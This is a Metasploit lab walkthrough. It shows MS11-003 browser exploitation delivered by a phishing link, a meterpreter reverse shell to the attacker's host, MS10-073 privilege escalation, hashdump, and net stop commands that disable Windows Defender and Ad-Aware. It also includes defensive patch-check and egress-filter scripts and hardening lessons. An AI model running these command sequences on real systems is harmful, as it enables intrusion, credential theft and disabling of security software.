Metasploit Exploitation Scenarios -EN : Scenario 2

Second scenario from the metasploit scenarios series

Metasploit Scenarios : Scenario 2
http://eromang.zataz.com - http://twitter.com/eromang

Scenario 2 : Topology

Target (192.168.111.0/24) <-> Firewall Gateway <-> Attacker (192.168.178.0/24)

Target :
- Windows XP SP3
- User «test» has a limited account profile
- IP : 192.168.111.129
- Default gateway : 192.168.111.128
- Antivirus : Ad-Aware Free / Windows Defender
- Local Windows Firewall activated
- Vulnerable to MS11-003 & MS10-073

Firewall Gateway :
- Eth0 : 192.168.111.128 (internal interface)
- Eth1 : 192.168.178.59 (external interface)

Attacker :
- IP : 192.168.178.21

Scenario 2 : Firewall rules

• Firewall administration by SSH only from the internal network
• Internal network is allowed to request «Any» protocols to the external network

Scenario 2 : Story-Board

✤ This network topology corresponds to most broadband ADSL Internet connections for home users and SMBs.
✤ Target has three active local countermeasure softwares : as you will see, they don't react to anything !
    ✤ Up-to-date Ad-Aware Free with default configuration.
    ✤ Windows Defender with default configuration.
    ✤ Windows Firewall with default configuration.
✤ Target is vulnerable to the MS11-003 Internet Explorer vulnerability and to the MS10-073 Keyboard Layout vulnerability
    ✤ MS11-003 will be our entry point
    ✤ MS10-073 our privilege escalation vector (the one used by Stuxnet)

Scenario 2 : Story-Board

✤ Attacker sends a Twitter message to the target. The message contains a malicious URL (could be shortened) in order to exploit the Internet Explorer MS11-003 vulnerability.
✤ The target clicks on the provided link and MS11-003 is exploited. After exploitation a reverse_tcp meterpreter payload, on port 4444/TCP, is launched.
✤ Attacker checks the installed countermeasures and tries to kill them, without success due to the limited privileges.
✤ Attacker has to check whether these Microsoft patches are installed, in order to do the MS10-073 privilege escalation :
    ✤ MS11-012 (KB2479628) / MS10-098 (KB2436673) / MS10-073 (KB981957)
    ✤ If any of these patches is installed the MS10-073 privilege escalation is not possible. winenum is the solution.
✤ Attacker then executes the MS10-073 privilege escalation post-exploitation module.
✤ Attacker stops the following services : Windows Defender / Lavasoft Ad-Aware Service
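The story-board turns on whether the three patches above are present on the target. The same check, seen from the defender's side, is a patch-compliance test that can be run over the output of "wmic qfe get HotFixID" or "systeminfo". The script below is an added example, not code from the slides or from the Metasploit project; the QFE output it parses is a constructed sample, and the rule that any one of the three KBs closes the MS10-073 path is taken from the slide.

```python
import re

# KB numbers named on the story-board slide: per the slide, any one of these
# being installed makes the MS10-073 privilege escalation impossible.
MS10_073_FIXES = {
    "MS10-073": "KB981957",
    "MS10-098": "KB2436673",
    "MS11-012": "KB2479628",
}

# Constructed sample of "wmic qfe get HotFixID" output (KB1000001/KB1000002 are
# placeholders, not real hotfix ids; KB981957 is the MS10-073 fix from the slide).
SAMPLE_QFE_OUTPUT = """HotFixID
KB1000001
KB981957
KB1000002
"""


def installed_kbs(qfe_text):
    """Return the set of KB identifiers found in QFE / systeminfo style output."""
    return set(re.findall(r"\bKB\d+\b", qfe_text, flags=re.IGNORECASE))


def ms10_073_status(qfe_text):
    """Evaluate the MS10-073 escalation path from hotfix output.

    Returns (protected, present, missing): protected is True when at least one
    of the three bulletins is installed; present/missing list the bulletin ids.
    """
    kbs = {kb.upper() for kb in installed_kbs(qfe_text)}
    present = sorted(b for b, kb in MS10_073_FIXES.items() if kb in kbs)
    missing = sorted(b for b, kb in MS10_073_FIXES.items() if kb not in kbs)
    return (bool(present), present, missing)


if __name__ == "__main__":
    protected, present, missing = ms10_073_status(SAMPLE_QFE_OUTPUT)
    print("MS10-073 path closed" if protected else "MS10-073 path OPEN")
    print("installed bulletins :", present)
    print("missing bulletins   :", missing)
```

On a real host, feed the script the captured "wmic qfe" output; an empty "present" list is the condition under which the scenario's escalation step succeeds, so that is the finding to act on.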

Scenario 2 : Metasploit commands

    use exploit/windows/browser/ms11_003_ie_css_import
    set SRVHOST 192.168.178.21
    set SRVPORT 80
    set URIPATH /readme.html
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.178.21
    exploit
    migrate X            -> to another process
    kill X               -> 2 times -> notepad.exe & main iexplorer.exe processes
    run getcountermeasure
    run getcountermeasure -k
    getuid
    shell
    echo %USERNAME%
    getprivs
    getsystem
    hashdump
    sysinfo
    ipconfig
    route
    background

Scenario 2 : Metasploit commands

    use post/windows/escalate/ms10_073_kbdlayout
    set SESSION 1
    run
    sessions -i 1
    getuid
    migrate X            -> to a «NT AUTHORITY\SYSTEM» process
    shell
    echo %USERNAME%
    net start
    net stop "Lavasoft Ad-Aware Service"
    net stop "Windows Defender"
    net start
    ps

Scenario 2 : Lessons Learned

• Update your OS and applications !
• Never click on unknown links, especially shortened URLs, from unknown sources !
• Don't trust your antivirus ! Select an antivirus that detects at least basic attacks !
• Don't trust your firewalls (local or remote) !
• Don't allow «Any» outbound protocol connections from your internal network to untrusted networks ! Limit your outbound connections to your real needs.
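The firewall-rules slide and the last lesson above describe the same weakness from two sides: the gateway forwards «Any» protocol outbound, so the reverse_tcp session on 4444/TCP from the story-board passes unhindered. The script below is an added example, not code from the slides, showing what an egress allow-list would have done. It assumes a small allow-list (HTTP, HTTPS, DNS) standing in for the LAN's "real needs", a netfilter-style key=value log format for the constructed gateway log lines, and the interface names and networks from the topology slide; the iptables rendering at the end is one possible way to express that policy on a Linux gateway.

```python
import ipaddress
import re

INTERNAL_NET = ipaddress.ip_network("192.168.111.0/24")  # target LAN, from the topology slide
INTERNAL_IF, EXTERNAL_IF = "eth0", "eth1"                # gateway interfaces, from the topology slide

# Assumed egress allow-list: the outbound services the LAN actually needs.
# It replaces the scenario's "Any protocols to external network" rule.
EGRESS_ALLOW = {("TCP", 80), ("TCP", 443), ("UDP", 53)}

# Constructed gateway log lines (not real captures). The second line has the
# shape of the story-board's meterpreter reverse_tcp session on 4444/TCP.
SAMPLE_LOG = """\
Mar  1 10:00:01 gw kernel: FORWARD IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=192.168.178.21 PROTO=TCP DPT=80
Mar  1 10:00:02 gw kernel: FORWARD IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=192.168.178.21 PROTO=TCP DPT=4444
Mar  1 10:00:03 gw kernel: FORWARD IN=eth0 OUT=eth0 SRC=192.168.111.129 DST=192.168.111.128 PROTO=TCP DPT=22
Mar  1 10:00:04 gw kernel: FORWARD IN=eth1 OUT=eth0 SRC=192.168.178.21 DST=192.168.111.129 PROTO=TCP DPT=4444
Mar  1 10:00:05 gw kernel: FORWARD IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=198.51.100.53 PROTO=UDP DPT=53
"""

LINE_RE = re.compile(r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=(?P<proto>\S+) DPT=(?P<dpt>\d+)")


def parse_line(line):
    """Extract (src, dst, proto, dport) from one log line, or None if it does not match."""
    m = LINE_RE.search(line)
    if not m:
        return None
    return (ipaddress.ip_address(m["src"]), ipaddress.ip_address(m["dst"]),
            m["proto"].upper(), int(m["dpt"]))


def is_outbound(src, dst):
    """True when the flow leaves the internal LAN for any other network."""
    return src in INTERNAL_NET and dst not in INTERNAL_NET


def egress_violations(log_text, allow=EGRESS_ALLOW):
    """Return the outbound flows that the allow-list would not have permitted.

    LAN-internal traffic and inbound traffic are out of scope here and skipped.
    """
    hits = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, dst, proto, dport = parsed
        if is_outbound(src, dst) and (proto, dport) not in allow:
            hits.append((str(src), str(dst), proto, dport))
    return hits


def iptables_rules(allow=EGRESS_ALLOW):
    """Render the allow-list as FORWARD-chain iptables rules ending in a default drop."""
    rules = []
    for proto, port in sorted(allow):
        rules.append(f"-A FORWARD -i {INTERNAL_IF} -o {EXTERNAL_IF} "
                     f"-p {proto.lower()} --dport {port} -j ACCEPT")
    rules.append(f"-A FORWARD -i {INTERNAL_IF} -o {EXTERNAL_IF} -j DROP")
    return rules


if __name__ == "__main__":
    for src, dst, proto, dport in egress_violations(SAMPLE_LOG):
        print(f"would be blocked: {src} -> {dst} {proto}/{dport}")
    print("\n".join(iptables_rules()))
```

Run against the constructed log, only the 4444/TCP flow is reported: the web request and the DNS lookup are on the allow-list, the SSH connection stays inside the LAN, and the inbound line is not an egress decision. Replaying a gateway's real forward log through egress_violations is a cheap way to size an allow-list before enforcing it.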